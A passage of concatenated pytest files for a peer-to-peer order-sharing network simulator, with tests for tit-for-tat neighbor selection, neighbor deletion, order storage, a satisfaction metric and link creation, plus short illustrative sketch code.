mutual: int,
optimistic: int,
time_now: int,
expected_length: int,
expected_seqs: Tuple[int, ...],
monkeypatch,
):
"""
Parameter explanation: please refer to CaseType data type definition.
This tests tit_for_tat() when all neighbors have a positive score.
"""
# Arrange
peer = create_a_test_peer(scenario, engine)[0]
peer.birth_time = 0
neighbor_peers = create_test_peers(scenario, engine, num_neighbors)
for i in range(num_neighbors):
neighbor_peers[i].seq = i
peer.add_neighbor(neighbor_peers[i])
neighbor_peers[i].add_neighbor(peer)
# make sure no one is having a score of zero
peer.peer_neighbor_mapping[neighbor_peers[i]].score = i + 300
monkeypatch.setattr(random, "sample", mock_random_sample)
# Act
selected_peer_set = engine_candidates.tit_for_tat(
baby_ending=10,
mutual=mutual,
optimistic=optimistic,
time_now=time_now,
time_start=peer.birth_time,
peer=peer,
)
# Assert
assert len(selected_peer_set) == expected_length
for peer in selected_peer_set:
assert peer.seq in expected_seqs
# The last test case is a bit different, so we treat it separately.
# We would like to test when some peers have zero contribution (score = 0).
# According to the implementation of tit-for-tat, only non-zero scored peers can be selected to
# the mutually-helping group (total number is "mutual"), but if there are not enough such peers,
# then this group of choice will only cover the qualified peers (score > 0) and we don't
# necessarily choose exactly "mutual" number of such peers, but we select up to all
# non-zero-scored peers. The quota in the "mutual" group can be wasted.
# For any peer which is not selected in the first group, they are put into the random choice
# group (will choose up to "optimistic" ones).
# In the following example, we have 5 peers whose score = 0, and 5 peers score > 0. Mutual = 7
# and optimistic = 3. However, we will only choose 5 mutually helping peers, and still select 3
# optimistic ones.
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_tit_for_tat__zero_contributors(scenario, engine, monkeypatch):
"""
This tests the most general case with a number of zero-contributors.
    Zero-contributors can never be put into the mutual-helper group, but they
    can still be optimistically chosen.
"""
peer = create_a_test_peer(scenario, engine)[0]
peer.birth_time = 0
neighbor_peers = create_test_peers(scenario, engine, 10)
for i in range(5):
neighbor_peers[i].seq = i
peer.add_neighbor(neighbor_peers[i])
neighbor_peers[i].add_neighbor(peer)
# making sure everyone is having a score of zero
peer.peer_neighbor_mapping[neighbor_peers[i]].score = 0
for i in range(5, 10):
neighbor_peers[i].seq = i
peer.add_neighbor(neighbor_peers[i])
neighbor_peers[i].add_neighbor(peer)
# making sure no one is having a score of zero
peer.peer_neighbor_mapping[neighbor_peers[i]].score = i + 300
monkeypatch.setattr(random, "sample", mock_random_sample)
# Act
selected_peer_set = engine_candidates.tit_for_tat(
baby_ending=10,
mutual=7,
optimistic=3,
time_now=100,
time_start=peer.birth_time,
peer=peer,
)
# Assert
assert len(selected_peer_set) == 8
for peer in selected_peer_set:
assert peer.seq in (5, 6, 7, 8, 9, 0, 1, 2)
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_tit_for_tat__baby_peer(scenario, engine, monkeypatch):
"""
    This tests the case where the requesting peer is still a baby
    (time_now - time_start < baby_ending). A baby peer selects its
    beneficiaries randomly, so all neighbors can be chosen even if their
    scores are zero.
"""
peer = create_a_test_peer(scenario, engine)[0]
peer.birth_time = 0
neighbor_peers = create_test_peers(scenario, engine, 10)
for i in range(10):
neighbor_peers[i].seq = i
peer.add_neighbor(neighbor_peers[i])
neighbor_peers[i].add_neighbor(peer)
# making sure everyone is having a score of zero
peer.peer_neighbor_mapping[neighbor_peers[i]].score = 0
monkeypatch.setattr(random, "sample", mock_random_sample)
# Act
# Now this peer should be considered as a baby since time_now - time_start < baby_ending,
# although time_now - peer.birth_time > baby_ending
selected_peer_set = engine_candidates.tit_for_tat(
baby_ending=10, mutual=7, optimistic=3, time_now=20, time_start=19, peer=peer
)
# Assert. All should be selected. In comparison, if it is not a baby peer, only 3 will be
# selected.
assert len(selected_peer_set) == 10
```
#### File: test/node/test_del_neighbor.py
```python
from typing import List
import pytest
from message import Order
from node import Peer
from ..__init__ import (
create_a_test_peer,
SCENARIO_SAMPLE,
ENGINE_SAMPLE,
create_a_test_order,
create_test_peers,
)
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_del_neighbor_normal(scenario, engine) -> None:
"""
normal case.
"""
# Arrange.
peer_list: List[Peer] = create_test_peers(scenario, engine, 2)
peer_list[0].add_neighbor(peer_list[1])
peer_list[1].add_neighbor(peer_list[0])
# Act.
peer_list[0].del_neighbor(peer_list[1])
# Assert.
# The deletion should be normal. Both sides should delete the other one.
assert (
not peer_list[0].peer_neighbor_mapping
and not peer_list[1].peer_neighbor_mapping
)
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_del_neighbor__non_existing(scenario, engine) -> None:
"""
Delete non existing neighbor.
"""
# Arrange.
peer_list: List[Peer] = create_test_peers(scenario, engine, 2)
# Act and Assert.
# Delete an non-existing neighbor
with pytest.raises(
ValueError, match="This peer is not my neighbor. Unable to delete."
):
peer_list[0].del_neighbor(peer_list[1])
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_del_neighbor__self(scenario, engine) -> None:
"""
Delete itself from neighbor set.
"""
# Arrange
peer: Peer = create_a_test_peer(scenario, engine)[0]
# Act and Assert. Delete self.
with pytest.raises(
ValueError, match="This peer is not my neighbor. Unable to delete."
):
peer.del_neighbor(peer)
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_del_neighbor_with_remove_order__in_storage(scenario, engine) -> None:
"""
This tests when there is an order from the deleted neighbor in the local storage.
"""
# Arrange.
# create my_peer and a neighbor. Later, the neighbor will be deleted.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
my_peer.add_neighbor(neighbor)
neighbor.add_neighbor(my_peer)
# we have a new order. Neighbor has it.
order: Order = create_a_test_order(scenario)
neighbor.receive_order_external(order)
# Manually set verification done
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# my_peer will have the order in local storage, from the neighbor
my_peer.receive_order_internal(neighbor, order)
# Manually set verification done
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# Act.
# my_peer deletes neighbor and cancels orders from it.
my_peer.del_neighbor(neighbor, remove_order=True)
# Assert.
# Now order should have been deleted from local storage.
assert order not in my_peer.order_orderinfo_mapping
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_del_neighbor_with_remove_order__single_pending_orderinfo(
scenario, engine
) -> None:
"""
This tests if there is a single orderinfo from the deleted neighbor in the pending table.
"""
# Arrange.
# create my_peer and a neighbor. Later, the neighbor will be deleted.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
my_peer.add_neighbor(neighbor)
neighbor.add_neighbor(my_peer)
# we have a new order. Neighbor has it.
order: Order = create_a_test_order(scenario)
neighbor.receive_order_external(order)
# Manually set verification done
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# my_peer will have the order in the pending table, from the neighbor
my_peer.receive_order_internal(neighbor, order)
# Act.
# my_peer deletes neighbor and cancels orders from it.
my_peer.del_neighbor(neighbor, remove_order=True)
# Assert.
# Now the order should have been deleted from the pending table.
assert order not in my_peer.order_pending_orderinfo_mapping
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_del_neighbor_with_remove_order__multi_pending_orderinfo(
scenario, engine
) -> None:
"""
Test if there are multiple orderinfos, one from the deleted neighbor, in the pending table.
"""
# Arrange.
# create my_peer and neighbors. Later, neighbor_list[0] will be deleted.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor_list: List[Peer] = create_test_peers(scenario, engine, 2)
for neighbor in neighbor_list:
my_peer.add_neighbor(neighbor)
neighbor.add_neighbor(my_peer)
# new order.
order: Order = create_a_test_order(scenario)
for neighbor in neighbor_list:
neighbor.receive_order_external(order)
# Manually set verification done
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# my_peer also has the order in its pending table, with copies from both neighbors.
for neighbor in neighbor_list:
my_peer.receive_order_internal(neighbor, order)
# Act.
# my_peer deletes neighbor 0 and cancels orders from it.
my_peer.del_neighbor(neighbor_list[0], remove_order=True)
# Assert.
# Now the order should still be in the pending table, but the remaining copy is not from neighbor_list[0].
assert len(my_peer.order_pending_orderinfo_mapping[order]) == 1
assert (
my_peer.order_pending_orderinfo_mapping[order][0].prev_owner == neighbor_list[1]
)
```
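The del_neighbor() behavior that these tests pin down can be summarized with a small standalone model. The `SketchPeer` class below is hypothetical (the real `Peer` in node.py keeps OrderInfo objects, not plain owner references); it only mirrors the observable effects asserted above: symmetric link removal, a ValueError for self or non-neighbors, and optional cleanup of stored and pending copies that came from the deleted neighbor.
```python
# Hypothetical model of the behavior asserted above; not the project's node.Peer.
from typing import Dict, List


class SketchPeer:
    def __init__(self) -> None:
        self.peer_neighbor_mapping: Dict["SketchPeer", bool] = {}
        # order id -> peer the stored copy came from
        self.order_orderinfo_mapping: Dict[str, "SketchPeer"] = {}
        # order id -> peers whose copies are still pending
        self.order_pending_orderinfo_mapping: Dict[str, List["SketchPeer"]] = {}

    def add_neighbor(self, other: "SketchPeer") -> None:
        self.peer_neighbor_mapping[other] = True

    def del_neighbor(self, other: "SketchPeer", remove_order: bool = False) -> None:
        if other is self or other not in self.peer_neighbor_mapping:
            raise ValueError("This peer is not my neighbor. Unable to delete.")
        # Deletion is symmetric: both sides drop the link.
        del self.peer_neighbor_mapping[other]
        other.peer_neighbor_mapping.pop(self, None)
        if remove_order:
            # Drop the stored copy if it came from the deleted neighbor ...
            self.order_orderinfo_mapping = {
                o: owner for o, owner in self.order_orderinfo_mapping.items()
                if owner is not other
            }
            # ... and drop its pending copies; an order with no copy left disappears.
            for o in list(self.order_pending_orderinfo_mapping):
                left = [p for p in self.order_pending_orderinfo_mapping[o] if p is not other]
                if left:
                    self.order_pending_orderinfo_mapping[o] = left
                else:
                    del self.order_pending_orderinfo_mapping[o]
```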
#### File: test/node/test_store_orders.py
```python
from typing import List
import pytest
from node import Peer
from message import Order, OrderInfo
from ..__init__ import (
create_a_test_order,
create_a_test_peer,
create_test_peers,
SCENARIO_SAMPLE,
ENGINE_SAMPLE,
)
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_store_orders__single_orderinfo(scenario, engine) -> None:
"""
This one tests the case where an order has a single orderinfo instance in the pending table
and later, it is put into local storage.
"""
# Arrange.
peer: Peer = create_a_test_peer(scenario, engine)[0]
order: Order = create_a_test_order(scenario)
peer.receive_order_external(order)
# Act.
peer.send_orders_to_on_chain_check(peer.local_clock)
peer.store_orders()
# Assert.
assert order in peer.order_orderinfo_mapping
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_store_orders__multi_orderinfo(scenario, engine, monkeypatch) -> None:
"""
This one tests the case where an order has multiple orderinfo instances in the pending table
and later, one of them is put into local storage.
"""
# Arrange.
# Create a peer and two neighbors for this peer. They will be connected.
peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor_list: List[Peer] = create_test_peers(scenario, engine, 2)
# create an order
order: Order = create_a_test_order(scenario)
# neighbors store this order and are connected to peer.
for neighbor in neighbor_list:
neighbor.add_neighbor(peer)
peer.add_neighbor(neighbor)
neighbor.receive_order_external(order)
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# since receive_order_internal() function has not been tested, we manually put the order
# into peer's pending table
for neighbor in neighbor_list:
orderinfo = OrderInfo(
engine=engine,
order=order,
master=neighbor,
arrival_time=peer.birth_time,
priority=None,
prev_owner=neighbor,
novelty=0,
)
if order not in peer.order_pending_orderinfo_mapping:
peer.order_pending_orderinfo_mapping[order] = [orderinfo]
peer.verification_time_orders_mapping[0].append(order)
else:
peer.order_pending_orderinfo_mapping[order].append(orderinfo)
order.hesitators.add(peer)
# manually set storage_decisions for the order.
# Store neighbor_0's orderinfo instance for the order.
for orderinfo in peer.order_pending_orderinfo_mapping[order]:
if orderinfo.prev_owner == neighbor_list[0]:
orderinfo.storage_decision = True
else:
orderinfo.storage_decision = False
# Disable engine.store_or_discard_orders which will otherwise
# change the values for orderinfo.storage_decision
def fake_storage_decision(_node):
pass
monkeypatch.setattr(engine, "store_or_discard_orders", fake_storage_decision)
peer.send_orders_to_on_chain_check(peer.local_clock)
# Act.
peer.store_orders()
# Assert.
# order should have been stored and it is the right version.
assert peer.order_orderinfo_mapping[order].prev_owner == neighbor_list[0]
# peer's pending table should have been cleared.
assert peer.order_pending_orderinfo_mapping == {}
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_store_orders__do_not_store(scenario, engine, monkeypatch) -> None:
"""
This one tests the case where an order has orderinfo instance(s) in the pending
table but, later, none of them is stored because all are labeled as not to store.
"""
# Arrange.
# Create a peer and two neighbors for this peer. They will be connected.
peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor_list: List[Peer] = create_test_peers(scenario, engine, 2)
# create an order
order: Order = create_a_test_order(scenario)
# neighbors store this order and are connected to peer.
for neighbor in neighbor_list:
neighbor.add_neighbor(peer)
peer.add_neighbor(neighbor)
neighbor.receive_order_external(order)
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# since receive_order_internal() function has not been tested, we manually put the order
# into peer's pending table
for neighbor in neighbor_list:
orderinfo = OrderInfo(
engine=engine,
order=order,
master=neighbor,
arrival_time=peer.birth_time,
priority=None,
prev_owner=neighbor,
novelty=0,
)
if order not in peer.order_pending_orderinfo_mapping:
peer.order_pending_orderinfo_mapping[order] = [orderinfo]
peer.verification_time_orders_mapping[0].append(order)
else:
peer.order_pending_orderinfo_mapping[order].append(orderinfo)
order.hesitators.add(peer)
# manually set storage_decisions for the order. All are False.
for orderinfo in peer.order_pending_orderinfo_mapping[order]:
orderinfo.storage_decision = False
# Disable engine.store_or_discard_orders which will otherwise
# change the values for orderinfo.storage_decision
def fake_storage_decision(_node):
pass
monkeypatch.setattr(engine, "store_or_discard_orders", fake_storage_decision)
peer.send_orders_to_on_chain_check(peer.local_clock)
# Act.
peer.store_orders()
# Assert.
# The order should not have been stored.
assert order not in peer.order_orderinfo_mapping
# peer's pending table should have been cleared.
assert peer.order_pending_orderinfo_mapping == {}
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_store_orders__sender_disconnected(scenario, engine, monkeypatch) -> None:
"""
This function tests the case of storing an order from a peer that recently disconnected
(it was still a neighbor when it sent this order to the peer).
"""
# Arrange.
# Create a peer and a neighbor for this peer.
peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
neighbor.add_neighbor(peer)
peer.add_neighbor(neighbor)
# create an order and the neighbor has this order.
order: Order = create_a_test_order(scenario)
neighbor.receive_order_external(order)
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
# We manually put the order into peer's pending table
orderinfo = OrderInfo(
engine=engine,
order=order,
master=neighbor,
arrival_time=peer.birth_time,
priority=None,
prev_owner=neighbor,
novelty=0,
)
peer.order_pending_orderinfo_mapping[order] = [orderinfo]
peer.verification_time_orders_mapping[0].append(order)
order.hesitators.add(peer)
# manually set storage_decisions for the order.
orderinfo.storage_decision = True
# Now let us disconnect the neighbor.
peer.del_neighbor(neighbor)
# Disable engine.store_or_discard_orders which will otherwise
# change the values for orderinfo.storage_decision
def fake_storage_decision(_node):
pass
monkeypatch.setattr(engine, "store_or_discard_orders", fake_storage_decision)
peer.send_orders_to_on_chain_check(peer.local_clock)
# Act.
peer.store_orders()
# Assert.
# order should have been stored, though the neighbor left.
assert peer.order_orderinfo_mapping[order].prev_owner == neighbor
# check peer's pending table. It should have been cleared.
assert peer.order_pending_orderinfo_mapping == {}
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_store_orders__multi_orderinfo_error(scenario, engine, monkeypatch) -> None:
"""
This function tests the case where an order has multiple orderinfo instances and more than
one is labeled to store. In such a case, an error is expected.
"""
# Arrange.
# Create a peer and two neighbors for this peer.
peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor_list: List[Peer] = create_test_peers(scenario, engine, 2)
# The order will have multiple orderinfo instances labeled to store, which will raise an error.
order: Order = create_a_test_order(scenario)
for neighbor in neighbor_list:
# each neighbor receives the orders and becomes the neighbor of the peer.
neighbor.receive_order_external(order)
neighbor.send_orders_to_on_chain_check(neighbor.local_clock)
neighbor.store_orders()
neighbor.add_neighbor(peer)
peer.add_neighbor(neighbor)
# since receive_order_internal() function has not been tested, we manually put the order
# into peer's pending table
for neighbor in neighbor_list:
orderinfo = OrderInfo(
engine=engine,
order=order,
master=neighbor,
arrival_time=peer.birth_time,
priority=None,
prev_owner=neighbor,
novelty=0,
)
if order not in peer.order_pending_orderinfo_mapping:
peer.order_pending_orderinfo_mapping[order] = [orderinfo]
peer.verification_time_orders_mapping[0].append(order)
else:
peer.order_pending_orderinfo_mapping[order].append(orderinfo)
order.hesitators.add(peer)
# manually set storage_decisions for each order as True
for orderinfo in peer.order_pending_orderinfo_mapping[order]:
orderinfo.storage_decision = True
# Disable engine.store_or_discard_orders which will otherwise
# change the values for orderinfo.storage_decision
def fake_storage_decision(_node):
pass
monkeypatch.setattr(engine, "store_or_discard_orders", fake_storage_decision)
peer.send_orders_to_on_chain_check(peer.local_clock)
# Act and Assert.
with pytest.raises(
ValueError, match="Should not store multiple copies of same order."
):
peer.store_orders()
```
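A compact way to see what store_orders() is being tested for: each pending order may carry several copies, at most one of which is allowed to be marked for storage. The helper below is an illustrative reduction of that rule (copies are just (owner, decision) pairs here, not OrderInfo objects), not the project's implementation.
```python
# Illustrative reduction of the store_orders() rule exercised above.
from typing import Dict, List, Tuple


def store_orders_sketch(pending: Dict[str, List[Tuple[str, bool]]]) -> Dict[str, str]:
    storage: Dict[str, str] = {}
    for order, copies in pending.items():
        winners = [owner for owner, decision in copies if decision]
        if len(winners) > 1:
            raise ValueError("Should not store multiple copies of same order.")
        if winners:
            storage[order] = winners[0]   # exactly one winning copy is kept
        # orders whose copies are all labeled False are simply discarded
    pending.clear()                        # the pending table is emptied either way
    return storage


# Mirrors test_store_orders__multi_orderinfo: neighbor_0's copy wins.
assert store_orders_sketch(
    {"order": [("neighbor_0", True), ("neighbor_1", False)]}
) == {"order": "neighbor_0"}
```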
#### File: test/performance_candidates/test_single_peer_satisfaction_neutral.py
```python
import copy
from typing import List, NamedTuple
import pytest
from scenario import Scenario
from engine import Engine
import performance_candidates
from ..__init__ import SCENARIO_SAMPLE, ENGINE_SAMPLE
# The arrange helper function needed in this module is exactly the same as in
# test_single_peer_order_receipt_ratio.py so we import it.
# We will be using the same CASE_3 as in test_single_peer_order_receipt_ratio.py so we import it.
from .test_single_peer_order_receipt_ratio import arrange_for_test, CASE_3
class CaseType(NamedTuple):
"""
Data type for test cases in this module. All elements are the same as CaseType in
test_single_peer_order_receipt_ratio.py except the last one.
"""
scenario: Scenario
engine: Engine
num_order: int
order_birth_time_list: List[int]
order_id_owned_by_peer: List[int]
order_id_in_stat: List[int]
max_age: int
window: int
expected_result: float # expected satisfaction result.
# Case 1 is very similar to case 1 in test_single_peer_order_receipt_ratio.py.
# Expected result is the average of non-None elements in expected_result in case 1 in
# test_single_peer_order_receipt_ratio.py
CASE_1 = CaseType(
scenario=SCENARIO_SAMPLE,
engine=ENGINE_SAMPLE,
num_order=11,
order_birth_time_list=[100, 100, 99, 70, 60, 55, 55, 12, 6, 1, 0],
order_id_owned_by_peer=[0, 1, 3, 7, 9, 10],
order_id_in_stat=[0, 2, 3, 4, 5, 6, 7, 8, 10],
max_age=100,
window=10,
expected_result=0.5,
)
# Case 2 is very similar to case 2 in test_single_peer_order_receipt_ratio.py.
# Expected result is the average of non-None elements in expected_result in case 2 in
# test_single_peer_order_receipt_ratio.py
CASE_2 = CaseType(
scenario=SCENARIO_SAMPLE,
engine=ENGINE_SAMPLE,
num_order=11,
order_birth_time_list=[100, 100, 99, 70, 60, 55, 55, 12, 6, 1, 0],
order_id_owned_by_peer=[0, 1, 3, 7, 9, 10],
order_id_in_stat=[0, 2, 3, 4, 5, 6, 7, 8, 10],
max_age=101,
window=10,
expected_result=3.5 / 6,
)
@pytest.mark.parametrize(
"scenario, engine, num_order, order_birth_time_list, order_id_owned_by_peer, "
"order_id_in_stat, max_age, window, expected_result",
[CASE_1, CASE_2],
)
def test_single_peer_satisfaction_neutral__normal(
scenario: Scenario,
engine: Engine,
num_order: int,
order_birth_time_list: List[int], # all birth times are normal
order_id_owned_by_peer: List[int],
order_id_in_stat: List[int],
max_age: int,
window: int,
expected_result: float,
):
"""
This function tests normal cases.
"""
# Arrange
peer, order_set = arrange_for_test(
scenario,
engine,
num_order,
order_birth_time_list,
order_id_owned_by_peer,
order_id_in_stat,
)
# Act
satisfaction = performance_candidates.single_peer_satisfaction_neutral(
cur_time=100,
peer=peer,
max_age_to_track=max_age,
statistical_window=window,
order_set=order_set,
)
# Assert.
assert satisfaction == expected_result
# Case 3 is the same as case 3 in test_single_peer_order_receipt_ratio.py. An error is expected.
@pytest.mark.parametrize(
"scenario, engine, num_order, order_birth_time_list_abnormal, order_id_owned_by_peer, "
"order_id_in_stat, max_age, window, _expected_result",
[CASE_3],
)
def test_single_peer_satisfaction_neutral__negative_age(
scenario: Scenario,
engine: Engine,
num_order: int,
# one birth time will be abnormal (> cur_time)
order_birth_time_list_abnormal: List[int],
order_id_owned_by_peer: List[int],
order_id_in_stat: List[int],
max_age: int,
window: int,
_expected_result: float,
):
"""
This function tests negative order age.
"""
# Arrange
peer, order_set = arrange_for_test(
scenario,
engine,
num_order,
order_birth_time_list_abnormal,
order_id_owned_by_peer,
order_id_in_stat,
)
# Act and Assert.
with pytest.raises(ValueError, match="Some order age is negative."):
performance_candidates.single_peer_satisfaction_neutral(
cur_time=100,
peer=peer,
max_age_to_track=max_age,
statistical_window=window,
order_set=order_set,
)
# Case 4 contains no orders for statistics. An error is expected.
CASE_4 = copy.deepcopy(CASE_2)
CASE_4.order_id_in_stat.clear()
@pytest.mark.parametrize(
"scenario, engine, num_order, order_birth_time_list, order_id_owned_by_peer, "
"order_id_in_stat_empty, max_age, window, _expected_result",
[CASE_4],
)
def test_single_peer_satisfaction_neutral__no_order(
scenario: Scenario,
engine: Engine,
num_order: int,
order_birth_time_list: List[int],
order_id_owned_by_peer: List[int],
order_id_in_stat_empty: List[int], # This will be empty
max_age: int,
window: int,
_expected_result: float,
):
"""
This function tests non-existence of orders.
"""
# Arrange
peer, order_set = arrange_for_test(
scenario,
engine,
num_order,
order_birth_time_list,
order_id_owned_by_peer,
order_id_in_stat_empty,
)
# Act and Assert.
with pytest.raises(
RuntimeError, match="Unable to judge a single peer satisfaction"
):
performance_candidates.single_peer_satisfaction_neutral(
cur_time=100,
peer=peer,
max_age_to_track=max_age,
statistical_window=window,
order_set=order_set,
)
```
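The expected_result values in CASE_1 and CASE_2 come from averaging receipt ratios, as the comments above state. Under that reading (an assumption about performance_candidates.single_peer_satisfaction_neutral(), not a quote of its code), the arithmetic is simply:
```python
# Assumed arithmetic behind expected_result: average the non-None receipt ratios.
from typing import List, Optional


def neutral_satisfaction(ratios: List[Optional[float]]) -> float:
    valid = [r for r in ratios if r is not None]
    if not valid:
        raise RuntimeError("Unable to judge a single peer satisfaction.")
    return sum(valid) / len(valid)


# Hypothetical per-window ratios whose average happens to equal CASE_1's 0.5.
assert neutral_satisfaction([1.0, 0.0, None, 0.5]) == 0.5
```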
#### File: test/single_and_multi_run/test_add_new_links_helper.py
```python
from typing import List, Tuple
import pytest
from single_run import SingleRun
from node import Peer
from scenario import Scenario
from engine import Engine
from performance import Performance
from ..__init__ import SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE
@pytest.fixture(autouse=True)
def temporary_change_of_neighbor_size(engine):
"""
This fixture temporarily changes the expected neighborhood size for the test functions
in this module.
It is set to autouse, so every test function in this module will use it.
"""
# Setup
original_neighbor_max = engine.neighbor_max
original_neighbor_min = engine.neighbor_min
engine.neighbor_max = 6
engine.neighbor_min = 3
yield
# Tear down
engine.neighbor_max = original_neighbor_max
engine.neighbor_min = original_neighbor_min
# Define some constants for use in this module.
NUM_FULLY_CONNECTED_PEERS = 7 # 7 peers are fully connected
TOTAL_NUM_OF_PEERS = 12 # total number of peers is 12
def create_single_run_instance_and_peers(
scenario: Scenario, engine: Engine, performance: Performance
) -> Tuple[SingleRun, List[Peer]]:
"""
This helper function sets up a single_run instance with 12 peers, among which the first 7
peers are connected with each other. It returns the single_run instance and the 12 peers.
"""
# Create the single_run instance
this_instance = SingleRun(scenario, engine, performance)
# Create 12 peers in this single_run
for _ in range(TOTAL_NUM_OF_PEERS):
this_instance.peer_arrival("normal", {})
# Record these peers
the_peer_list: List[Peer] = list()
iterator = iter(this_instance.peer_full_set)
for _ in range(TOTAL_NUM_OF_PEERS):
the_peer_list.append(next(iterator))
# For the first 7 peers, they form a full mesh.
for any_peer in the_peer_list[0:NUM_FULLY_CONNECTED_PEERS]:
for other_peer in the_peer_list[0:NUM_FULLY_CONNECTED_PEERS]:
if (
any_peer is not other_peer
and any_peer not in other_peer.peer_neighbor_mapping
):
any_peer.add_neighbor(other_peer)
other_peer.add_neighbor(any_peer)
return this_instance, the_peer_list
@pytest.mark.parametrize(
"scenario, engine, performance",
[(SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE)],
)
def test_add_new_links_helper__normal(
scenario: Scenario, engine: Engine, performance: Performance
) -> None:
"""
This function tests add_new_links_helper() in a normal case.
"""
# Arrange
# Create the single_run instance and peers
single_run_instance, peer_list = create_single_run_instance_and_peers(
scenario, engine, performance
)
# Act.
# Now, let peer_list[7] try to add 3 neighbors, or at least 1.
min_neighbor = 1
max_neighbor = 3
single_run_instance.add_new_links_helper(
peer_list[NUM_FULLY_CONNECTED_PEERS], max_neighbor, min_neighbor
)
# Assert.
assert (
min_neighbor
<= len(peer_list[NUM_FULLY_CONNECTED_PEERS].peer_neighbor_mapping)
<= max_neighbor
)
for any_peer in peer_list[0:NUM_FULLY_CONNECTED_PEERS]:
assert (
any_peer not in peer_list[NUM_FULLY_CONNECTED_PEERS].peer_neighbor_mapping
)
@pytest.mark.parametrize(
"scenario, engine, performance",
[(SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE)],
)
def test_add_new_links_helper__all_to_add(
scenario: Scenario, engine: Engine, performance: Performance
) -> None:
"""
This function tests add_new_links_helper() where the number of possible neighbors to add is
4, and the minimum requirement is also 4. So all possibilities are tried and added.
"""
# Arrange
# Create the single_run instance and peers
single_run_instance, peer_list = create_single_run_instance_and_peers(
scenario, engine, performance
)
# Act.
# Now, let peer_list[7] try to add 4 neighbors, and at least 4.
neighbor_size = 4
single_run_instance.add_new_links_helper(
peer_list[NUM_FULLY_CONNECTED_PEERS], neighbor_size, neighbor_size
)
# Assert.
assert (
len(peer_list[NUM_FULLY_CONNECTED_PEERS].peer_neighbor_mapping) == neighbor_size
)
for any_peer in peer_list[0:NUM_FULLY_CONNECTED_PEERS]:
assert (
any_peer not in peer_list[NUM_FULLY_CONNECTED_PEERS].peer_neighbor_mapping
)
for any_peer in peer_list[NUM_FULLY_CONNECTED_PEERS + 1 :]:
assert any_peer in peer_list[NUM_FULLY_CONNECTED_PEERS].peer_neighbor_mapping
@pytest.mark.parametrize(
"scenario, engine, performance",
[(SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE)],
)
def test_add_new_links_helper__tried_the_best(
scenario: Scenario, engine: Engine, performance: Performance
) -> None:
"""
This function tests add_new_links_helper() where the number of possible neighbors to add is
4, and the minimum requirement is 6 (and tries at 8 maximal). So all possibilities are tried
and added, and the process ends, although the added number does not reach 6.
"""
# Arrange
# Create the single_run instance and peers
single_run_instance, peer_list = create_single_run_instance_and_peers(
scenario, engine, performance
)
# Act.
# Now, let peer_list[7] try to add 8 neighbors, and at least 6.
min_neighbor = 6
max_neighbor = 8
single_run_instance.add_new_links_helper(
peer_list[NUM_FULLY_CONNECTED_PEERS], max_neighbor, min_neighbor
)
# Assert.
assert (
len(peer_list[NUM_FULLY_CONNECTED_PEERS].peer_neighbor_mapping)
== TOTAL_NUM_OF_PEERS - NUM_FULLY_CONNECTED_PEERS - 1
)
for peer in peer_list[0:NUM_FULLY_CONNECTED_PEERS]:
assert peer not in peer_list[NUM_FULLY_CONNECTED_PEERS].peer_neighbor_mapping
for peer in peer_list[NUM_FULLY_CONNECTED_PEERS + 1 :]:
assert peer in peer_list[NUM_FULLY_CONNECTED_PEERS].peer_neighbor_mapping
@pytest.mark.parametrize(
"scenario, engine, performance",
[(SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE)],
)
def test_add_new_links_helper__error_input(
scenario: Scenario, engine: Engine, performance: Performance
) -> None:
"""
This function tests add_new_links_helper() where input values are wrong.
"""
# Arrange
# Create the single_run instance and peers
single_run_instance, peer_list = create_single_run_instance_and_peers(
scenario, engine, performance
)
# Act and Assert.
with pytest.raises(ValueError, match="Input value is invalid."):
single_run_instance.add_new_links_helper(peer_list[7], 4, 6)
with pytest.raises(ValueError, match="Input value is invalid."):
single_run_instance.add_new_links_helper(peer_list[7], 0, 0)
with pytest.raises(ValueError, match="Input value is invalid."):
